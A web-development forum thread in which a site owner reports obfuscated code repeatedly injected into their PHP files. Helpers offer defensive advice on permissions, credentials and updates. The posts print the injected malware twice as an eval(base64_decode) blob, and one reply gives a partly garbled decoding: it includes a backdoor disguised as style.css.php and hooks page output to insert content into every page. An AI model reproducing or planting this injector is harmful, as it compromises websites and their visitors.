code added to my php files
Moderator: General Moderators
code added to my php files
Hi we keep getting a spam code inserted somehow in to our php files , how do we stop it? we keep changing password etc in cpanel but so oftwen keep getting it ..i have just deleted it before i made the post so i cant add it but it has words like eval etc in it has anyone know of a remedy? thanks guys
-
Paul Arnold
- Forum Contributor
- Posts: 141
- Joined: Fri Jun 13, 2008 10:09 am
- Location: Newcastle Upon Tyne
Re: code added to my php files
You've probably got your permissions set too high.
Try setting them to 644.
Try setting them to 644.
Re: code added to my php files
Thanks but they are set at 644
Re: code added to my php files
Who's the owner (the system one
) of these files?
There are 10 types of people in this world, those who understand binary and those who don't
- jaoudestudios
- DevNet Resident
- Posts: 1483
- Joined: Wed Jun 18, 2008 8:32 am
- Location: Surrey
Re: code added to my php files
Is it definitely into your php files or into the database? and is being shown on your web pages?fascript wrote:Hi we keep getting a spam code inserted somehow in to our php files
- kaisellgren
- DevNet Resident
- Posts: 1675
- Joined: Sat Jan 07, 2006 5:52 am
- Location: Lahti, Finland.
Re: code added to my php files
Are you saying someone has modified (keeps modifying) your PHP files?
Re: code added to my php files
Hi yes its happened a couple of times, infact heres one i didnt clean out
<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9mcmVlYWMvcHVibGljX2h0bWwvZm9ydW1zL1RoZW1lcy9jbGFzc2ljL2ltYWdlcy90b3BpYy9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL2hvbWUvZnJlZWFjL3B1YmxpY19odG1sL2ZvcnVtcy9UaGVtZXMvY2xhc3NpYy9pbWFnZXMvdG9waWMvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgpeyRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkI9b3JkKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDMsMSkpOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9MTA7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0wO2lmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImNCl7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT11bnBhY2soJ3YnLHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDEwLDIpKTskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPSRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzFbMV07JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9MiskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjgpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMTYpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9Mjt9JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz1nemluZmxhdGUoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkpO2lmKCRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9PT1GQUxTRSl7JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz0kUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4O31yZXR1cm4gJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mzt9fWZ1bmN0aW9uIGRnb2JoKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0Ype0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA9Z3pkZWNvZGUoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCkpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApO31lbHNle3JldHVybiBnbWwoKS4kUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>
<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9mcmVlYWMvcHVibGljX2h0bWwvZm9ydW1zL1RoZW1lcy9jbGFzc2ljL2ltYWdlcy90b3BpYy9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL2hvbWUvZnJlZWFjL3B1YmxpY19odG1sL2ZvcnVtcy9UaGVtZXMvY2xhc3NpYy9pbWFnZXMvdG9waWMvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgpeyRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkI9b3JkKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDMsMSkpOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9MTA7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0wO2lmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImNCl7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT11bnBhY2soJ3YnLHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDEwLDIpKTskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPSRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzFbMV07JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9MiskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjgpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMTYpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9Mjt9JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz1nemluZmxhdGUoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkpO2lmKCRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9PT1GQUxTRSl7JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz0kUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4O31yZXR1cm4gJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mzt9fWZ1bmN0aW9uIGRnb2JoKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0Ype0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA9Z3pkZWNvZGUoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCkpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApO31lbHNle3JldHVybiBnbWwoKS4kUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>
- kaisellgren
- DevNet Resident
- Posts: 1675
- Joined: Sat Jan 07, 2006 5:52 am
- Location: Lahti, Finland.
Re: code added to my php files
Great... someone has cracked into your system pretty much. 
It could be almost anything. FTP account exposed, vulnerable web server or a vulnerable application installed on your hosting account.
At this point I can only recommend you to update all software and remove all unnecessary software. Update all credentials (even FTP, etc) and then put your site back online. If this stops the modification of your files, then one or more applications that you updated was/were vulnerable to an attack.
It could be almost anything. FTP account exposed, vulnerable web server or a vulnerable application installed on your hosting account.
At this point I can only recommend you to update all software and remove all unnecessary software. Update all credentials (even FTP, etc) and then put your site back online. If this stops the modification of your files, then one or more applications that you updated was/were vulnerable to an attack.
Re: code added to my php files
Thanks guys for your comments, i did have someone decode it ,it looks like harmless spam .As soon as i delete it ,it comes back as if its knows lol
Re: code added to my php files
Are your php scripts pulling data from anywhere? A database, other sites, etc?
Does it come back immediately even after changing all your account passwords?
You should also notify your host provider, someone sharing the system with you might have found a hole to access your file structure.
Does it come back immediately even after changing all your account passwords?
You should also notify your host provider, someone sharing the system with you might have found a hole to access your file structure.
Re: code added to my php files
It decodes to this..
It's looking for some sort of forum software. If you're using some it's been compromised. Update it to the latest version, or better still, switch to something else.
Code: Select all
if (function_exists('ob_start')&&!isset($GLOBALS['sh_no'])) {
$GLOBALS['sh_no'] = 1;
if(file_exists('/home/freeac/public_html/forums/Themes/classic/images/topic/style.css.php')) {
include_once('/home/freeac/public_html/forums/Themes/classic/images/topic/style.css.php');
if(function_exists('gml')&&!function_exists('dgobh')) {
if(!function_exists('gzdecode')) {
function gzdecode($var2) {
$var1 = ord(substr($var2,3,1));
$var3 = 10;
$var4 = 0;
if($var1&4) {
$var4 = unpack('v', substr($var2,10,2));
$var4 = $var4[1];
$var3 += 2+$var4;
}
if($var1&8) {
$var3 = strpos($var2,chr(0),$var3)+1;
}
if($var1&16) {
$var3 = strpos($var2,chr(0),$var3)+1;
}
if($var1&2) {
$var3 += 2;
}
$var5 = gzinflate(substr($var2,$var3));
if($var5===FALSE) {
$var5 = $var2;
}
return $var5;
}
}
function dgobh($var6) {
Header('Content-Encoding: none');
$var7 = gzdecode($var6);
if (preg_match('/\]*\>)/si','$1'.gml(),$var7);
} else {
return gml().$var7;
}
}
ob_start('dgobh');
}
}
}